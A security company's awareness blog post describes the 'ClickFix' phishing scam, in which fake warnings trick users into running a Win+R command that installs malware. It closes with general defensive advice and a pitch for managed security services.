Sales: 833-761-0695
Support: 509-465-1234 x 2
Remote Support Login
See Service Pricing

Beware of the ClickFix Scam!

TorchLight’s Threat Intelligence team has uncovered a resurgence of a phishing scam called ‘ClickFix,’ initially identified in late 2024 but now widely used by cybercriminals in 2025.

by

Augusto Melo
in

TorchLight’s Threat Intelligence team has uncovered a resurgence of a phishing scam called ‘ClickFix,’ initially identified in late 2024 but now widely used by cybercriminals in 2025. This scam tricks users into installing malicious software that can steal sensitive data, such as financial and medical information, login credentials, and even deploy ransomware. 

Defending against ClickFix and similar threats is no easy feat. Phishing attacks have skyrocketed since 2023. In 2024 alone, over 932,000 unique phishing sites were detected worldwide. Phishing emails increased by 1,265%, and credential-stealing attacks grew by 967% compared to 2022. What these numbers show is that phishing attacks not only remain highly effective, but they are evolving, becoming more complex and harder to detect.  

How the ClickFix Attack Works

You might encounter fake warning messages while browsing or through phishing emails. These messages claim your computer is infected, needs an urgent update, or requires identity verification using tools like reCAPTCHA. ‘

The attacker then instructs you to press the Win+R key combination and enter a command. This action downloads malware (such as AsyncRAT, Danabot, DarkGate, or Lumma Stealer) directly onto your computer, bypassing security measures. 

What Happens Next?

Initially, you may not notice any changes. However, within minutes, your computer could slow down, display error messages, or, in the worst cases, become completely locked with a ransomware note demanding payment. If that happens, don’t panic. If your computer suddenly slows down or displays unusual messages after following suspicious instructions, disconnect from the internet and report the issue to your organization’s Security or IT department. 

Why Are These Scams So Effective?

Scammers prey on fear, urgency, and FOMO (Fear of Missing Out). They manipulate you into acting quickly without thinking. Remember, taking a moment to verify a request can save you from major headaches, data loss and downtime.

How You Can Stay Protected

Don’t Follow Instructions from Unknown Sources: Legitimate websites or companies will never ask you to run commands on your computer. If you’re unsure, reach out to your IT or Security team immediately. 

If In Doubt, Take A Time Out: Slowing down, collecting your thoughts and then taking the time to analyze the request and ideally utilizing another (different) channel to confirm the urgent request.

Defending against phishing scams like ClickFix requires a combination of tools and practices, including:

  • Email Security and DNS Filtering: These block harmful links and emails before they reach you.
  • Antivirus and EDR (Endpoint Detection and Response): These detect and stop malware in real time.
  • Firewall Policies and Regular Updates: Keeping your systems patched and secure helps close vulnerabilities.
  • Phishing Awareness Training: Educating yourself and your team is critical to recognizing and avoiding scams.

Additionally, organizations should implement 24/7 monitoring of assets and user accounts to detect threats early and apply prompt mitigation actions to eliminate, quarantine or limit potential damages. 

By staying informed and cautious, you can protect yourself and your organization from evolving cyber threats. If you’d like to learn more about defending against advanced phishing attacks, contact us for expert advice and resources from our Managed Security Services team.

Credit to ProofPoint for making the initial discovery on this with additional victim stories.